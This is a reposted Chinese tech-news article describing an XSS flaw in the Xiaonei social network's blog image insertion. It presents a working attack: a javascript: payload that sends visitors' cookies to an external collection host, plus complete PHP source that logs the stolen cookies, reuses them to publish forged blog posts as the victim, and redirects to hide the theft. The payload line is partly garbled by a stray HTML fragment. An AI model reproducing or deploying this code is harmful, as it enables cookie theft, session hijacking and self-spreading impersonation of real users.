校内网最新xss可窃Cookies密码

运维• 2025-02-28 19:21 •技术资讯

校内网在发blog时对插入图片过滤不严格，存在xss漏洞。

在发blog时将插入图片URL写为如下代码即可触发：普通浏览复制代码打印代码

javascript:window.location.href='http://www.xxx.com/test.
 href="tag.php?name=php">php?cookie='+document.cookie

javascript:window.location.href=’http://www.xxx.com/test.php?cookie=’+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码

     ob_start();    
$url = 'blog.xiaonei.com';   
$cookie=$_GET['cookie'];   
$cookie1=$cookie."\r\n\r\n";   
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt   
//发一条伪造的日志，这条日志里面也可以插入恶意代码   
$sock = fsockopen("$url", 80, $errno, $errstr, 30);   
if (!$sock) die("$errstr ($errno)\n");   
$data = "title=test by fly&body=test by 
fly&categoryId=0&blogControl=99&passwordProtedted=0&
passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";   
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");   
fwrite($sock, "Accept: */*\r\n");   
fwrite($sock, "Referer: http://$url\r\n");   
fwrite($sock, "Accept-Language: zh-cn\r\n");   
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");   
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");   
fwrite($sock, "User-Agent: Mozilla\r\n");   
fwrite($sock, "Host: $url\r\n");   
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");   
fwrite($sock, "Connection: Keep-Alive\r\n");   
fwrite($sock, "Cache-Control: no-cache\r\n");   
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");   
fwrite($sock, $data);   
$headers = "";   
while ($str = trim(fgets($sock, 4096)))   
$headers .= "$str\n";   
echo "\n";   
$body = "";   
while (!feof($sock))   
$body .= fgets($sock, 4096);   
fclose($sock);   
//echo $body;   
//跳转到一个正常的日志   
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");    
ob_end_flush();   
?>

【编辑推荐】

一只完整的XSS wrom实现流程
XSS攻击Cookie欺骗中隐藏JavaScript执行
利用HTTP-only Cookie缓解XSS之痛

文章来源网络，作者：运维，如若转载，请注明出处：https://shuyeidc.com/wp/133669.html<

赞 (0)

威胁情报共享：是安全突破，还是昙花一现？

上一篇2025-02-28 19:21

值得推荐的11种流行的渗透测试工具

下一篇 2025-02-28 19:22

技术资讯
个人主题怎么制作？
制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程，无论是用于个人博客、作品集、社交媒体账号还是品牌形象，核心都是围绕“个人特色”展开，以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程，明确主题定位：找到个人特色的核心主题定位是所有工作的起点，需要先回答……
运维
2025-11-20
00
技术资讯
社群营销管理关键是什么？
社群营销的核心在于通过建立有温度、有价值、有归属感的社群，实现用户留存、转化和品牌传播，其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明：明确社群定位与目标社群管理的首要任务是精准定位，需明确社群的核心价值（如行业交流、产品使用指导、兴趣分享等）、目标用户画像……
运维
2025-11-20
00
技术资讯
香港公司网站备案需要什么材料？
香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程，尤其需兼顾中国内地与香港两地的监管要求，由于香港公司注册地与中国内地不同，其网站若主要服务内地用户或使用内地服务器，需根据服务器位置、网站内容性质等，选择对应的备案路径（如工信部ICP备案或公安备案），以下从备案主体资格、流程步骤、材料准备、注意事项……
运维
2025-11-20
00
技术资讯
如何企业上云推广
企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求，构建系统性、多维度的推广体系，以下从市场定位、策略设计、执行落地及效果优化四个维度，详细拆解企业上云推广的实践路径，精准定位：明确目标企业与核心价值企业上云并非“一刀切”的方案，需先锁定目标客户群体，提炼差异化价值主张，客户分层……
运维
2025-11-20
00
技术资讯
PS设计搜索框的实用技巧有哪些？
在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量，以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明，帮助打造符合需求的搜索框，设计前的规划明确使用场景：根据网站或APP的整体风格确定搜索框的调性，例如极简风适合细线条和纯色，科技感适合渐变和发光效果，电商类则可能需要突出搜索……
运维
2025-11-20
00

发表回复